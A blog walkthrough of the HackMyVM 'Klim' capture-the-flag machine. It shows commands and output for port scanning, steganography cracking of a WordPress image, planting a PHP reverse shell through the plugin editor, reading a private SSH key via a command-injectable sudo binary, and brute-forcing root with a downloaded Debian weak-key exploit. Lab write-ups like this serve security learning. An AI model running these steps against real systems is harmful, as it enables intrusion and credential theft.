Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Klim Walkthrough

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim


Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80, found wordpress.

 /index.html           (Status: 200) [Size: 11331]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]


Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-contents/uploads, found an image.

 ~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg


Found decrypt password, get file dump.

 ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt                                                                                                                                   steghide-0 | 1 [10:35:13]
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)          
 
 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump


Found login credentials in dump.

 ~ cat dump|grep pwd 
 log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
 ss7WhrrnnHOZC#9bQn


Login wordpress, in Plugin Editor, modify one php file and add your php shell code into source.

Then get reverse shell.

 ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php 
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:57032.
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Check sudo -l of www-data.

 www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool


Decompile tool, read the source code. It actually does "cat argv[1]".

 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   size_t v3; // rbx
   size_t v4; // rax
   char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
   char *dest; // [rsp+20h] [rbp-20h]
   size_t size; // [rsp+28h] [rbp-18h]
 
   strcpy(s, "cat ");
   v3 = strlen(s);
   size = v3 + strlen(argv[1]) + 1;
   dest = (char *)malloc(size);
   strncpy(dest, s, size);
   v4 = strlen(s);
   strncat(dest, argv[1], size - v4);
   system(dest);
   return 0;
 }


Get ssh key of user klim.

 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
 ...
 jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
 Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
 49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
 -----END OPENSSH PRIVATE KEY-----
 www-data@klim:/home/klim$


Login ssh as klim.

 ~ ssh klim@192.168.56.100 -i id_rsa 
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Found id_rsa.pub in /opt, following author's hint, use openssl

 ~ searchsploit  openssl                                                                                   ...
 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH                                                                                           | linux/remote/5720.py
 ...
 


Following the steps in poc.

  wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
  tar -jxvf 5622.tar.bz2
  python 5720.py rsa/2048 192.168.56.100 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec
 
 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100
 
 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec


Get root login.

 ~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
 ...
 root@klim:~# id;hostname              
 uid=0(root) gid=0(root) groupes=0(root)
 klim                                                        




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0